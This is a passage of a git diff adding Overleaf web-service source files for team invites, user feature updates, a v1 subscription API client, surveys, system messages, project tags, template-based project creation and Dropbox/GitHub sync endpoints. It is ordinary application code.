true } + } + + const existingMember = subscription.member_ids.find( + memberId => memberId.toString() === existingUser._id.toString() + ) + + if (existingMember) { + logger.debug( + { subscriptionId: subscription.id, email }, + 'user already in team' + ) + return { possible: false, reason: { alreadyInTeam: true } } + } else { + return { possible: true } + } +} + +function _getInviterName(inviter) { + let inviterName + if (inviter.first_name && inviter.last_name) { + inviterName = `${inviter.first_name} ${inviter.last_name} (${inviter.email})` + } else { + inviterName = inviter.email + } + + return inviterName +} + +module.exports = { + getInvite: callbackifyMultiResult(getInvite, ['invite', 'subscription']), + createInvite: callbackify(createInvite), + importInvite: callbackify(importInvite), + acceptInvite: callbackify(acceptInvite), + revokeInvite: callbackify(revokeInvite), + createTeamInvitesForLegacyInvitedEmail: callbackify( + createTeamInvitesForLegacyInvitedEmail + ), + promises: { + getInvite, + createInvite, + importInvite, + acceptInvite, + revokeInvite, + createTeamInvitesForLegacyInvitedEmail, + }, +} diff --git a/services/web/app/src/Features/Subscription/UserFeaturesUpdater.js b/services/web/app/src/Features/Subscription/UserFeaturesUpdater.js new file mode 100644 index 0000000..e29eb8e --- /dev/null +++ b/services/web/app/src/Features/Subscription/UserFeaturesUpdater.js @@ -0,0 +1,61 @@ +const { User } = require('../../models/User') +const { callbackify } = require('util') +const Settings = require('@overleaf/settings') + +function _featuresChanged(newFeatures, featuresBefore) { + for (const feature in newFeatures) { + if (featuresBefore[feature] !== newFeatures[feature]) { + return true + } + } + return false +} + +async function updateFeatures(userId, features) { + const update = { + featuresUpdatedAt: new Date(), + } + // record the system-wide features epoch, if defined + if (Settings.featuresEpoch) { + update.featuresEpoch = Settings.featuresEpoch + } + for (const key in features) { + const value = features[key] + update[`features.${key}`] = value + } + const docBeforeUpdate = await User.findByIdAndUpdate(userId, update).exec() + let featuresChanged = false + if (docBeforeUpdate) { + featuresChanged = _featuresChanged(features, docBeforeUpdate.features) + } + + return { features, featuresChanged } +} + +async function overrideFeatures(userId, features) { + const update = { features, featuresUpdatedAt: new Date() } + const docBeforeUpdate = await User.findByIdAndUpdate(userId, update).exec() + let featuresChanged = false + if (docBeforeUpdate) { + featuresChanged = _featuresChanged(features, docBeforeUpdate.features) + } + return featuresChanged +} + +async function createFeaturesOverride(userId, featuresOverride) { + return await User.updateOne( + { _id: userId }, + { $push: { featuresOverrides: featuresOverride } } + ).exec() +} + +module.exports = { + updateFeatures: callbackify(updateFeatures), + overrideFeatures: callbackify(overrideFeatures), + createFeaturesOverride: callbackify(createFeaturesOverride), + promises: { + updateFeatures, + overrideFeatures, + createFeaturesOverride, + }, +} diff --git a/services/web/app/src/Features/Subscription/V1SubscriptionManager.js b/services/web/app/src/Features/Subscription/V1SubscriptionManager.js new file mode 100644 index 0000000..6a852eb --- /dev/null +++ b/services/web/app/src/Features/Subscription/V1SubscriptionManager.js @@ -0,0 +1,123 @@ +let V1SubscriptionManager +const UserGetter = require('../User/UserGetter') +const request = require('requestretry') +const settings = require('@overleaf/settings') +const { V1ConnectionError, NotFoundError } = require('../Errors/Errors') +const { promisifyAll } = require('@overleaf/promise-utils') + +module.exports = V1SubscriptionManager = { + cancelV1Subscription(userId, callback) { + V1SubscriptionManager._v1Request( + userId, + { + method: 'DELETE', + url(v1Id) { + return `/api/v1/overleaf/users/${v1Id}/subscription` + }, + }, + callback + ) + }, + + v1IdForUser(userId, callback) { + UserGetter.getUser(userId, { 'overleaf.id': 1 }, function (err, user) { + if (err) { + return callback(err) + } + const v1Id = user?.overleaf?.id + callback(null, v1Id) + }) + }, + + // v1 accounts created before migration to v2 had github and mendeley for free + // but these are now paid-for features for new accounts (v1id > cutoff) + getGrandfatheredFeaturesForV1User(v1Id) { + const cutoff = settings.v1GrandfatheredFeaturesUidCutoff + if (!cutoff) { + return {} + } + if (!v1Id) { + return {} + } + + if (v1Id < cutoff) { + return settings.v1GrandfatheredFeatures || {} + } else { + return {} + } + }, + + _v1Request(userId, options, callback) { + if (!settings.apis.v1.url) { + return callback(null, null) + } + + V1SubscriptionManager.v1IdForUser(userId, function (err, v1Id) { + if (err) { + return callback(err) + } + if (!v1Id) { + return callback(null, null, null) + } + const url = options.url(v1Id) + const requestOptions = { + baseUrl: settings.apis.v1.url, + url, + method: options.method, + auth: { + user: settings.apis.v1.user, + pass: settings.apis.v1.pass, + sendImmediately: true, + }, + json: true, + timeout: settings.apis.v1.timeout, + } + if (options.method === 'GET') { + requestOptions.maxAttempts = 3 + requestOptions.retryDelay = 500 + } else { + requestOptions.maxAttempts = 0 + } + request(requestOptions, function (error, response, body) { + if (error) { + return callback( + new V1ConnectionError({ + message: 'no v1 connection', + info: { url }, + }).withCause(error) + ) + } + if (response && response.statusCode >= 500) { + return callback( + new V1ConnectionError({ + message: 'error from v1', + info: { + status: response.statusCode, + body, + }, + }) + ) + } + if (response.statusCode >= 200 && response.statusCode < 300) { + return callback(null, body, v1Id) + } else { + if (response.statusCode === 404) { + return callback(new NotFoundError(`v1 user not found: ${userId}`)) + } else { + return callback( + new Error( + `non-success code from v1: ${response.statusCode} ${ + options.method + } ${options.url(v1Id)}` + ) + ) + } + } + }) + }) + }, +} + +module.exports.promises = promisifyAll(module.exports, { + without: ['getGrandfatheredFeaturesForV1User'], +}) diff --git a/services/web/app/src/Features/Subscription/types.ts b/services/web/app/src/Features/Subscription/types.ts new file mode 100644 index 0000000..59453ac --- /dev/null +++ b/services/web/app/src/Features/Subscription/types.ts @@ -0,0 +1,6 @@ +import { + PaypalPaymentMethod, + CreditCardPaymentMethod, +} from './PaymentProviderEntities' + +export type PaymentMethod = PaypalPaymentMethod | CreditCardPaymentMethod diff --git a/services/web/app/src/Features/Survey/SurveyCache.mjs b/services/web/app/src/Features/Survey/SurveyCache.mjs new file mode 100644 index 0000000..28b43fe --- /dev/null +++ b/services/web/app/src/Features/Survey/SurveyCache.mjs @@ -0,0 +1,25 @@ +import SurveyManager from './SurveyManager.js' +import { Survey } from '../../models/Survey.js' +import { CacheLoader } from 'cache-flow' + +class SurveyCache extends CacheLoader { + constructor() { + super('survey', { + expirationTime: 60, // 1min in seconds + }) + } + + async load() { + return await SurveyManager.getSurvey() + } + + serialize(value) { + return value?.toObject() + } + + deserialize(value) { + return new Survey(value) + } +} + +export default new SurveyCache() diff --git a/services/web/app/src/Features/Survey/SurveyHandler.mjs b/services/web/app/src/Features/Survey/SurveyHandler.mjs new file mode 100644 index 0000000..009bc12 --- /dev/null +++ b/services/web/app/src/Features/Survey/SurveyHandler.mjs @@ -0,0 +1,64 @@ +// ts-check +import crypto from 'node:crypto' + +import SurveyCache from './SurveyCache.mjs' +import SubscriptionLocator from '../Subscription/SubscriptionLocator.js' +import { callbackify } from '@overleaf/promise-utils' + +/** + * @import { Survey } from '../../../../types/project/dashboard/survey' + */ + +/** + * determines if there is a survey to show, given current surveys and rollout percentages + * uses userId in computation, to ensure that rollout groups always contain same users + * @param {string} userId + * @returns {Promise<Survey | undefined>} + */ +async function getSurvey(userId) { + const survey = await SurveyCache.get(true) + if (survey) { + if (survey.options?.hasRecurlyGroupSubscription) { + const hasRecurlyGroupSubscription = + await SubscriptionLocator.promises.hasRecurlyGroupSubscription(userId) + if (!hasRecurlyGroupSubscription) { + return + } + } + + const { name, preText, linkText, url, options } = survey?.toObject() || {} + // default to full rollout for backwards compatibility + const rolloutPercentage = options?.rolloutPercentage || 100 + if (!_userInRolloutPercentile(userId, name, rolloutPercentage)) { + return + } + + return { name, preText, linkText, url } + } +} + +function _userRolloutPercentile(userId, surveyName) { + const hash = crypto + .createHash('md5') + .update(userId + surveyName) + .digest('hex') + const hashPrefix = hash.substring(0, 8) + return Math.floor( + ((parseInt(hashPrefix, 16) % 0xffffffff) / 0xffffffff) * 100 + ) +} + +function _userInRolloutPercentile(userId, surveyName, rolloutPercentage) { + if (rolloutPercentage === 100) { + return true + } + const userPercentile = _userRolloutPercentile(userId, surveyName) + return userPercentile < rolloutPercentage +} + +export default { + getSurvey: callbackify(getSurvey), + promises: { + getSurvey, + }, +} diff --git a/services/web/app/src/Features/Survey/SurveyManager.js b/services/web/app/src/Features/Survey/SurveyManager.js new file mode 100644 index 0000000..abaee90 --- /dev/null +++ b/services/web/app/src/Features/Survey/SurveyManager.js @@ -0,0 +1,37 @@ +const { Survey } = require('../../models/Survey') +const OError = require('@overleaf/o-error') + +async function getSurvey() { + try { + return await Survey.findOne().exec() + } catch (error) { + throw OError.tag(error, 'Failed to get survey') + } +} + +async function updateSurvey({ name, preText, linkText, url, options }) { + let survey = await getSurvey() + if (!survey) { + survey = new Survey() + } + survey.name = name + survey.preText = preText + survey.linkText = linkText + survey.url = url + survey.options = options + await survey.save() + return survey +} + +async function deleteSurvey() { + const survey = await getSurvey() + if (survey) { + await survey.deleteOne() + } +} + +module.exports = { + getSurvey, + updateSurvey, + deleteSurvey, +} diff --git a/services/web/app/src/Features/SystemMessages/SystemMessageController.js b/services/web/app/src/Features/SystemMessages/SystemMessageController.js new file mode 100644 index 0000000..41339aa --- /dev/null +++ b/services/web/app/src/Features/SystemMessages/SystemMessageController.js @@ -0,0 +1,27 @@ +const Settings = require('@overleaf/settings') +const SessionManager = require('../Authentication/SessionManager') +const SystemMessageManager = require('./SystemMessageManager') + +const ProjectController = { + getMessages(req, res, next) { + if (!SessionManager.isUserLoggedIn(req.session)) { + // gracefully handle requests from anonymous users + return res.json([]) + } + let messages = SystemMessageManager.getMessages() + + if (!Settings.siteIsOpen) { + // Override all messages with notice for admins when site is closed. + messages = [ + { + content: + 'SITE IS CLOSED TO PUBLIC. OPEN ONLY FOR SITE ADMINS. DO NOT EDIT PROJECTS.', + _id: 'protected', // prevents hiding message in frontend + }, + ] + } + res.json(messages || []) + }, +} + +module.exports = ProjectController diff --git a/services/web/app/src/Features/SystemMessages/SystemMessageManager.js b/services/web/app/src/Features/SystemMessages/SystemMessageManager.js new file mode 100644 index 0000000..96a6676 --- /dev/null +++ b/services/web/app/src/Features/SystemMessages/SystemMessageManager.js @@ -0,0 +1,59 @@ +const { SystemMessage } = require('../../models/SystemMessage') +const { + addRequiredCleanupHandlerBeforeDrainingConnections, +} = require('../../infrastructure/GracefulShutdown') +const { callbackifyAll } = require('@overleaf/promise-utils') +const logger = require('@overleaf/logger') + +const SystemMessageManager = { + _cachedMessages: [], + + getMessages() { + return this._cachedMessages + }, + + async getMessagesFromDB() { + return await SystemMessage.find({}).exec() + }, + + async clearMessages() { + await SystemMessage.deleteMany({}).exec() + await this.refreshCache() + }, + + async createMessage(content) { + const message = new SystemMessage({ content }) + await message.save() + await this.refreshCache() + }, + + async refreshCache() { + this._cachedMessages = await this.getMessagesFromDB() + }, + + refreshCacheInBackground() { + this.refreshCache().catch(err => { + logger.warn({ err }, 'failed to refresh system messages cache') + }) + }, +} + +const CACHE_TIMEOUT = 10 * 1000 * (Math.random() + 2) // 20-30 seconds +SystemMessageManager.refreshCacheInBackground() +const intervalHandle = setInterval( + () => SystemMessageManager.refreshCacheInBackground(), + CACHE_TIMEOUT +) + +addRequiredCleanupHandlerBeforeDrainingConnections( + 'update system messages', + () => { + clearInterval(intervalHandle) + } +) + +module.exports = { + getMessages: SystemMessageManager.getMessages.bind(SystemMessageManager), + ...callbackifyAll(SystemMessageManager, { without: ['getMessages'] }), + promises: SystemMessageManager, +} diff --git a/services/web/app/src/Features/Tags/TagsController.mjs b/services/web/app/src/Features/Tags/TagsController.mjs new file mode 100644 index 0000000..807e48a --- /dev/null +++ b/services/web/app/src/Features/Tags/TagsController.mjs @@ -0,0 +1,102 @@ +import TagsHandler from './TagsHandler.js' +import SessionManager from '../Authentication/SessionManager.js' +import Errors from '../Errors/Errors.js' +import { expressify } from '@overleaf/promise-utils' + +async function _getTags(userId, _req, res) { + if (!userId) { + throw new Errors.NotFoundError() + } + const allTags = await TagsHandler.promises.getAllTags(userId) + res.json(allTags) +} + +async function apiGetAllTags(req, res) { + const { userId } = req.params + await _getTags(userId, req, res) +} + +async function getAllTags(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + await _getTags(userId, req, res) +} + +async function createTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { name, color } = req.body + const tag = await TagsHandler.promises.createTag(userId, name, color) + res.json(tag) +} + +async function addProjectToTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId, projectId } = req.params + await TagsHandler.promises.addProjectToTag(userId, tagId, projectId) + res.status(204).end() +} + +async function addProjectsToTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + const { projectIds } = req.body + await TagsHandler.promises.addProjectsToTag(userId, tagId, projectIds) + res.status(204).end() +} + +async function removeProjectFromTag(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId, projectId } = req.params + await TagsHandler.promises.removeProjectFromTag(userId, tagId, projectId) + res.status(204).end() +} + +async function removeProjectsFromTag(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + const { projectIds } = req.body + await TagsHandler.promises.removeProjectsFromTag(userId, tagId, projectIds) + res.status(204).end() +} + +async function deleteTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + await TagsHandler.promises.deleteTag(userId, tagId) + res.status(204).end() +} + +async function renameTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + const name = req.body?.name + if (!name) { + return res.status(400).end() + } + await TagsHandler.promises.renameTag(userId, tagId, name) + res.status(204).end() +} + +async function editTag(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { tagId } = req.params + const name = req.body?.name + const color = req.body?.color + if (!name) { + return res.status(400).end() + } + await TagsHandler.promises.editTag(userId, tagId, name, color) + res.status(204).end() +} + +export default { + apiGetAllTags: expressify(apiGetAllTags), + getAllTags: expressify(getAllTags), + createTag: expressify(createTag), + addProjectToTag: expressify(addProjectToTag), + addProjectsToTag: expressify(addProjectsToTag), + removeProjectFromTag: expressify(removeProjectFromTag), + removeProjectsFromTag: expressify(removeProjectsFromTag), + deleteTag: expressify(deleteTag), + renameTag: expressify(renameTag), + editTag: expressify(editTag), +} diff --git a/services/web/app/src/Features/Tags/TagsHandler.js b/services/web/app/src/Features/Tags/TagsHandler.js new file mode 100644 index 0000000..65314c8 --- /dev/null +++ b/services/web/app/src/Features/Tags/TagsHandler.js @@ -0,0 +1,167 @@ +const { Tag } = require('../../models/Tag') +const { callbackify } = require('@overleaf/promise-utils') + +const MAX_TAG_LENGTH = 50 + +async function getAllTags(userId) { + return Tag.find({ user_id: userId }) +} + +async function countTagsForProject(userId, projectId) { + return Tag.countDocuments({ user_id: userId, project_ids: projectId }) +} + +async function getTagsForProject(userId, projectId) { + return Tag.find({ user_id: userId, project_ids: projectId }, '-project_ids') +} + +async function createTag(userId, name, color, options = {}) { + if (name.length > MAX_TAG_LENGTH) { + if (options.truncate) { + name = name.slice(0, MAX_TAG_LENGTH) + } else { + throw new Error('Exceeded max tag length') + } + } + try { + return await Tag.create({ user_id: userId, name, color }) + } catch (error) { + // on duplicate key error return existing tag + if (error && error.code === 11000) { + return Tag.findOne({ user_id: userId, name }) + } + throw error + } +} + +async function renameTag(userId, tagId, name) { + if (name.length > MAX_TAG_LENGTH) { + throw new Error('Exceeded max tag length') + } + return Tag.updateOne( + { + _id: tagId, + user_id: userId, + }, + { + $set: { + name, + }, + } + ) +} + +async function editTag(userId, tagId, name, color) { + if (name.length > MAX_TAG_LENGTH) { + throw new Error('Exceeded max tag length') + } + return Tag.updateOne( + { + _id: tagId, + user_id: userId, + }, + { + $set: { + name, + color, + }, + } + ) +} + +async function deleteTag(userId, tagId) { + await Tag.deleteOne({ + _id: tagId, + user_id: userId, + }) +} + +async function removeProjectFromTag(userId, tagId, projectId) { + const searchOps = { + _id: tagId, + user_id: userId, + } + const deleteOperation = { $pull: { project_ids: projectId } } + await Tag.updateOne(searchOps, deleteOperation) +} + +async function removeProjectsFromTag(userId, tagId, projectIds) { + const searchOps = { + _id: tagId, + user_id: userId, + } + const deleteOperation = { $pullAll: { project_ids: projectIds } } + await Tag.updateOne(searchOps, deleteOperation) +} + +async function addProjectToTag(userId, tagId, projectId) { + const searchOps = { + _id: tagId, + user_id: userId, + } + const insertOperation = { $addToSet: { project_ids: projectId } } + return Tag.findOneAndUpdate(searchOps, insertOperation) +} + +async function addProjectsToTag(userId, tagId, projectIds) { + const searchOps = { + _id: tagId, + user_id: userId, + } + const insertOperation = { $addToSet: { project_ids: { $each: projectIds } } } + await Tag.findOneAndUpdate(searchOps, insertOperation) +} + +async function addProjectToTagName(userId, name, projectId) { + const searchOps = { + name, + user_id: userId, + } + const insertOperation = { $addToSet: { project_ids: projectId } } + await Tag.updateOne(searchOps, insertOperation, { upsert: true }) +} + +async function removeProjectFromAllTags(userId, projectId) { + const searchOps = { user_id: userId } + const deleteOperation = { $pull: { project_ids: projectId } } + await Tag.updateMany(searchOps, deleteOperation) +} + +async function addProjectToTags(userId, tagIds, projectId) { + const searchOps = { user_id: userId, _id: { $in: tagIds } } + const insertOperation = { $addToSet: { project_ids: projectId } } + await Tag.updateMany(searchOps, insertOperation) +} + +module.exports = { + getAllTags: callbackify(getAllTags), + countTagsForProject: callbackify(countTagsForProject), + getTagsForProject: callbackify(getTagsForProject), + createTag: callbackify(createTag), + renameTag: callbackify(renameTag), + editTag: callbackify(editTag), + deleteTag: callbackify(deleteTag), + addProjectToTag: callbackify(addProjectToTag), + addProjectsToTag: callbackify(addProjectsToTag), + addProjectToTags: callbackify(addProjectToTags), + removeProjectFromTag: callbackify(removeProjectFromTag), + removeProjectsFromTag: callbackify(removeProjectsFromTag), + addProjectToTagName: callbackify(addProjectToTagName), + removeProjectFromAllTags: callbackify(removeProjectFromAllTags), + promises: { + getAllTags, + countTagsForProject, + getTagsForProject, + createTag, + renameTag, + editTag, + deleteTag, + addProjectToTag, + addProjectsToTag, + addProjectToTags, + removeProjectFromTag, + removeProjectsFromTag, + addProjectToTagName, + removeProjectFromAllTags, + }, +} diff --git a/services/web/app/src/Features/Tags/types.d.ts b/services/web/app/src/Features/Tags/types.d.ts new file mode 100644 index 0000000..17a43fd --- /dev/null +++ b/services/web/app/src/Features/Tags/types.d.ts @@ -0,0 +1,7 @@ +export type Tag = { + _id: string + user_id: string + name: string + color?: string + project_ids?: string[] +} diff --git a/services/web/app/src/Features/Templates/TemplatesController.js b/services/web/app/src/Features/Templates/TemplatesController.js new file mode 100644 index 0000000..ac82d0c --- /dev/null +++ b/services/web/app/src/Features/Templates/TemplatesController.js @@ -0,0 +1,62 @@ +const path = require('path') +const SessionManager = require('../Authentication/SessionManager') +const TemplatesManager = require('./TemplatesManager') +const ProjectHelper = require('../Project/ProjectHelper') +const logger = require('@overleaf/logger') +const { expressify } = require('@overleaf/promise-utils') + +const TemplatesController = { + getV1Template(req, res) { + const templateVersionId = req.params.Template_version_id + const templateId = req.query.id + if (!/^[0-9]+$/.test(templateVersionId) || !/^[0-9]+$/.test(templateId)) { + logger.err( + { templateVersionId, templateId }, + 'invalid template id or version' + ) + return res.sendStatus(400) + } + const data = { + templateVersionId, + templateId, + name: req.query.templateName, + compiler: ProjectHelper.compilerFromV1Engine(req.query.latexEngine), + imageName: req.query.texImage, + mainFile: req.query.mainFile, + brandVariationId: req.query.brandVariationId, + } + return res.render( + path.resolve( + __dirname, + '../../../views/project/editor/new_from_template' + ), + data + ) + }, + + async createProjectFromV1Template(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const project = await TemplatesManager.promises.createProjectFromV1Template( + req.body.brandVariationId, + req.body.compiler, + req.body.mainFile, + req.body.templateId, + req.body.templateName, + req.body.templateVersionId, + userId, + req.body.imageName + ) + delete req.session.templateData + if (!project) { + throw new Error('failed to create project from template') + } + return res.redirect(`/project/${project._id}`) + }, +} + +module.exports = { + getV1Template: TemplatesController.getV1Template, + createProjectFromV1Template: expressify( + TemplatesController.createProjectFromV1Template + ), +} diff --git a/services/web/app/src/Features/Templates/TemplatesManager.js b/services/web/app/src/Features/Templates/TemplatesManager.js new file mode 100644 index 0000000..6a2b620 --- /dev/null +++ b/services/web/app/src/Features/Templates/TemplatesManager.js @@ -0,0 +1,153 @@ +const { Project } = require('../../models/Project') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') +const ProjectOptionsHandler = + require('../Project/ProjectOptionsHandler').promises +const ProjectRootDocManager = + require('../Project/ProjectRootDocManager').promises +const ProjectUploadManager = require('../Uploads/ProjectUploadManager') +const fs = require('fs') +const util = require('util') +const logger = require('@overleaf/logger') +const { + fetchJson, + fetchStreamWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') +const crypto = require('crypto') +const Errors = require('../Errors/Errors') +const { pipeline } = require('stream/promises') +const ClsiCacheManager = require('../Compile/ClsiCacheManager') + +const TemplatesManager = { + async createProjectFromV1Template( + brandVariationId, + compiler, + mainFile, + templateId, + templateName, + templateVersionId, + userId, + imageName + ) { + const zipUrl = `${settings.apis.v1.url}/api/v1/overleaf/templates/${templateVersionId}` + const zipReq = await fetchStreamWithResponse(zipUrl, { + basicAuth: { + user: settings.apis.v1.user, + password: settings.apis.v1.pass, + }, + signal: AbortSignal.timeout(settings.apis.v1.timeout), + }) + + const projectName = ProjectDetailsHandler.fixProjectName(templateName) + const dumpPath = `${settings.path.dumpFolder}/${crypto.randomUUID()}` + const writeStream = fs.createWriteStream(dumpPath) + try { + const attributes = { + fromV1TemplateId: templateId, + fromV1TemplateVersionId: templateVersionId, + } + await pipeline(zipReq.stream, writeStream) + + if (zipReq.response.status !== 200) { + logger.warn( + { uri: zipUrl, statusCode: zipReq.response.status }, + 'non-success code getting zip from template API' + ) + throw new Error(`get zip failed: ${zipReq.response.status}`) + } + const project = + await ProjectUploadManager.promises.createProjectFromZipArchiveWithName( + userId, + projectName, + dumpPath, + attributes + ) + + const prepareClsiCacheInBackground = ClsiCacheManager.prepareClsiCache( + project._id, + userId, + { templateId, templateVersionId } + ).catch(err => { + logger.warn( + { err, templateId, templateVersionId, projectId: project._id }, + 'failed to prepare clsi-cache from template' + ) + }) + + await TemplatesManager._setCompiler(project._id, compiler) + await TemplatesManager._setImage(project._id, imageName) + await TemplatesManager._setMainFile(project._id, mainFile) + await TemplatesManager._setBrandVariationId(project._id, brandVariationId) + + const update = { + fromV1TemplateId: templateId, + fromV1TemplateVersionId: templateVersionId, + } + await Project.updateOne({ _id: project._id }, update, {}) + + await prepareClsiCacheInBackground + + return project + } finally { + await fs.promises.unlink(dumpPath) + } + }, + + async _setCompiler(projectId, compiler) { + if (compiler == null) { + return + } + await ProjectOptionsHandler.setCompiler(projectId, compiler) + }, + + async _setImage(projectId, imageName) { + if (!imageName) { + imageName = 'wl_texlive:2018.1' + } + + await ProjectOptionsHandler.setImageName(projectId, imageName) + }, + + async _setMainFile(projectId, mainFile) { + if (mainFile == null) { + return + } + await ProjectRootDocManager.setRootDocFromName(projectId, mainFile) + }, + + async _setBrandVariationId(projectId, brandVariationId) { + if (brandVariationId == null) { + return + } + await ProjectOptionsHandler.setBrandVariationId(projectId, brandVariationId) + }, + + async fetchFromV1(templateId) { + const url = new URL(`/api/v2/templates/${templateId}`, settings.apis.v1.url) + + try { + return await fetchJson(url, { + basicAuth: { + user: settings.apis.v1.user, + password: settings.apis.v1.pass, + }, + signal: AbortSignal.timeout(settings.apis.v1.timeout), + }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + throw new Errors.NotFoundError() + } else { + throw err + } + } + }, +} + +module.exports = { + promises: TemplatesManager, + createProjectFromV1Template: util.callbackify( + TemplatesManager.createProjectFromV1Template + ), + fetchFromV1: util.callbackify(TemplatesManager.fetchFromV1), +} diff --git a/services/web/app/src/Features/Templates/TemplatesMiddleware.js b/services/web/app/src/Features/Templates/TemplatesMiddleware.js new file mode 100644 index 0000000..ff3bebf --- /dev/null +++ b/services/web/app/src/Features/Templates/TemplatesMiddleware.js @@ -0,0 +1,21 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') + +module.exports = { + saveTemplateDataInSession(req, res, next) { + if (req.query.templateName) { + req.session.templateData = req.query + } + return next() + }, +} diff --git a/services/web/app/src/Features/Templates/TemplatesRouter.js b/services/web/app/src/Features/Templates/TemplatesRouter.js new file mode 100644 index 0000000..8f66c53 --- /dev/null +++ b/services/web/app/src/Features/Templates/TemplatesRouter.js @@ -0,0 +1,36 @@ +const AuthenticationController = require('../Authentication/AuthenticationController') +const TemplatesController = require('./TemplatesController') +const TemplatesMiddleware = require('./TemplatesMiddleware') +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const RateLimiterMiddleware = require('../Security/RateLimiterMiddleware') +const AnalyticsRegistrationSourceMiddleware = require('../Analytics/AnalyticsRegistrationSourceMiddleware') + +const rateLimiter = new RateLimiter('create-project-from-template', { + points: 20, + duration: 60, +}) + +module.exports = { + rateLimiter, + apply(app) { + app.get( + '/project/new/template/:Template_version_id', + (req, res, next) => + AnalyticsRegistrationSourceMiddleware.setSource( + 'template', + req.params.Template_version_id + )(req, res, next), + TemplatesMiddleware.saveTemplateDataInSession, + AuthenticationController.requireLogin(), + TemplatesController.getV1Template, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + app.post( + '/project/new/template', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiter), + TemplatesController.createProjectFromV1Template + ) + }, +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsController.mjs b/services/web/app/src/Features/ThirdPartyDataStore/TpdsController.mjs new file mode 100644 index 0000000..2b8667b --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsController.mjs @@ -0,0 +1,230 @@ +import { expressify } from '@overleaf/promise-utils' +import TpdsUpdateHandler from './TpdsUpdateHandler.mjs' +import UpdateMerger from './UpdateMerger.js' +import Errors from '../Errors/Errors.js' +import logger from '@overleaf/logger' +import Path from 'node:path' +import metrics from '@overleaf/metrics' +import NotificationsBuilder from '../Notifications/NotificationsBuilder.js' +import SessionManager from '../Authentication/SessionManager.js' +import ProjectCreationHandler from '../Project/ProjectCreationHandler.js' +import ProjectDetailsHandler from '../Project/ProjectDetailsHandler.js' +import HttpErrorHandler from '../Errors/HttpErrorHandler.js' +import TpdsQueueManager from './TpdsQueueManager.mjs' + +async function createProject(req, res) { + const { user_id: userId } = req.params + let { projectName } = req.body + projectName = await ProjectDetailsHandler.promises.generateUniqueName( + userId, + projectName + ) + const project = await ProjectCreationHandler.promises.createBlankProject( + userId, + projectName, + {}, + { skipCreatingInTPDS: true } + ) + res.json({ + projectId: project._id.toString(), + }) +} + +// mergeUpdate and deleteUpdate are used by Dropbox, where the project is only +// passed as the name, as the first part of the file path. They have to check +// the project exists, find it, and create it if not. They also ignore 'noisy' +// files like .DS_Store, .gitignore, etc. + +async function mergeUpdate(req, res) { + metrics.inc('tpds.merge-update') + const { filePath, userId, projectId, projectName } = parseParams(req) + const source = req.headers['x-update-source'] || 'unknown' + + let metadata + try { + metadata = await TpdsUpdateHandler.promises.newUpdate( + userId, + projectId, + projectName, + filePath, + req, + source + ) + } catch (err) { + if (err.name === 'TooManyRequestsError') { + logger.warn( + { err, userId, filePath }, + 'tpds update failed to be processed, too many requests' + ) + return res.sendStatus(429) + } else if (err.message === 'project_has_too_many_files') { + logger.warn( + { err, userId, filePath }, + 'tpds trying to append to project over file limit' + ) + NotificationsBuilder.tpdsFileLimit(userId).create(projectName, projectId) + return res.sendStatus(400) + } else { + throw err + } + } + + if (metadata == null) { + return res.json({ status: 'rejected' }) + } + + const payload = { + status: 'applied', + projectId: metadata.projectId.toString(), + entityId: metadata.entityId.toString(), + entityType: metadata.entityType, + folderId: metadata.folderId.toString(), + } + + // When the update is a doc edit, the update is merged in docupdater and + // doesn't generate a new rev. + if (metadata.rev != null) { + payload.rev = metadata.rev.toString() + } + res.json(payload) +} + +async function deleteUpdate(req, res) { + metrics.inc('tpds.delete-update') + const { filePath, userId, projectId, projectName } = parseParams(req) + const source = req.headers['x-update-source'] || 'unknown' + + await TpdsUpdateHandler.promises.deleteUpdate( + userId, + projectId, + projectName, + filePath, + source + ) + res.sendStatus(200) +} + +/** + * Update endpoint that accepts update details as JSON + */ +async function updateFolder(req, res) { + const userId = req.body.userId + const projectId = req.body.projectId + const { projectName, filePath } = splitPath(projectId, req.body.path) + const metadata = await TpdsUpdateHandler.promises.createFolder( + userId, + projectId, + projectName, + filePath + ) + if (metadata == null) { + return HttpErrorHandler.conflict(req, res, 'Could not create folder', { + userId, + projectName, + filePath, + }) + } + res.json({ + entityId: metadata.folderId.toString(), + projectId: metadata.projectId.toString(), + path: metadata.path, + folderId: metadata.parentFolderId?.toString() || null, + }) +} + +// updateProjectContents and deleteProjectContents are used by GitHub. The +// project_id is known so we can skip right ahead to creating/updating/deleting +// the file. These methods will not ignore noisy files like .DS_Store, +// .gitignore, etc because people are generally more explicit with the files +// they want in git. + +async function updateProjectContents(req, res) { + const projectId = req.params.project_id + const path = `/${req.params[0]}` // UpdateMerger expects leading slash + const source = req.headers['x-update-source'] || 'unknown' + + try { + const metadata = await UpdateMerger.promises.mergeUpdate( + null, + projectId, + path, + req, + source + ) + res.json({ + entityId: metadata.entityId.toString(), + rev: metadata.rev, + }) + } catch (error) { + if ( + error instanceof Errors.InvalidNameError || + error instanceof Errors.DuplicateNameError + ) { + res.sendStatus(422) + } else { + throw error + } + } +} + +async function deleteProjectContents(req, res) { + const 